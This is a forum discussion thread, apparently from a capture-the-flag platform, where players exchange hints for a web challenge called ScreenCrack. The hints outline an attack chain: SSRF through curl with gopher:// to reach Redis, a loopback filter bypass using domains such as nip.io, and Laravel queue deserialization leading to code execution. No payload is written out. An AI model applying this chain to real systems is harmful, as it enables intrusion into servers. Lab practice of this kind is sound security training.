Official ScreenCrack Discussion

system · May 17, 2024, 8:00pm

Official discussion thread for ScreenCrack. Please do not post any spoilers or big hints.

sarp · May 17, 2024, 11:28pm

wtf is that challenge

joshiemoore · May 21, 2024, 11:52am

That was really fun and interesting! Loved it

HackInTheBox · May 21, 2024, 3:25pm

Any hints on how to solve it?

Hilbert · May 27, 2024, 5:23am

As with all web challenges, follow the user input all the way through the code. Understand the functions that interact with that input. Are any vulnerable? Think about what things you could do with the input you control, what kind of bypasses are available to you, can you make the app do anything the developer hadn’t considered?

more specific hints: what other services are running? Maybe you can interact with it. Remember, HTTP isn’t the only protocol that exists.
Also, make sure to look at every file, maybe there is one that contains a record of someones failed attempt at doing what it is you want to do

Mindlaess · June 9, 2024, 11:00pm

Any hints please? I’ll tell you what I found out so far: I noticed the redis server running and i found out you can issue commands to redis even through curl using gopher:// as a schema. However what I’m stuck on is the filter_var on 127.0.0.1; I tried every possible bypass I could find, but if something bypasses the filter, it crashes on curl and viceversa. Can anyone give me a nudge?

use0x1337 · June 11, 2024, 9:04pm

Did you check all bypasses as well as public domains which might resolve to 127.0.0.1?

Oblivi0n · June 11, 2024, 11:02pm

I’ve bypassed the filter but i can’t find a working gopher payload. Is it the right path?

use0x1337 · June 12, 2024, 9:02am

Yep, it is the right path. Try to analyze the data (as well as the data structure) - use the docker instance to look into it.

Mindlaess · June 13, 2024, 9:36am

Thanks for the help, I managed to get execution on the redis instance, but when I can’t achieve RCE since I get the error can't set protected config. Is there anything else to try on redis since there are no keyspaces?

use0x1337 · June 14, 2024, 6:31am

There are keyspaces. It is just a matter of time because they will be regularly cleared.

Mindlaess · June 16, 2024, 2:24pm

I couldn’t find anything beside Laravel queues and apparently those are known to be vulnerable, but I don’t know how to queue jobs to exploit the deserialization RCE. Any further tip?

thanhhades · September 19, 2024, 4:14pm

nip.io

t54 · November 30, 2024, 12:14am

Any hints for me, please . I found that we can use gopher protocal and bypass 127.0.0.1 to exploit ssrf attack on redis and i guest that we can get RCE by manipulation the file name to exploit command injection attack but i can’t find out the right way to conduct a payload for push a job to redis queue and execute it
Could someone hints me something? i don’t want give up in here

xtmts · January 10, 2025, 6:51am

ssrf to redis.
laravel_database_queues.
php unserialize to commond execute.

Topic		Replies	Views
Official Neonify Discussion Challenges	21	5902	October 8, 2024
Official DoxPit Discussion Challenges	20	1397	February 13, 2025
Official ArtificialUniversity Discussion Challenges	8	725	November 22, 2024
Official Pentest Notes Discussion Challenges	16	2224	February 7, 2025
baby ninja jinja Challenges ninja , jinja	21	5255	November 29, 2020

Official ScreenCrack Discussion

Related topics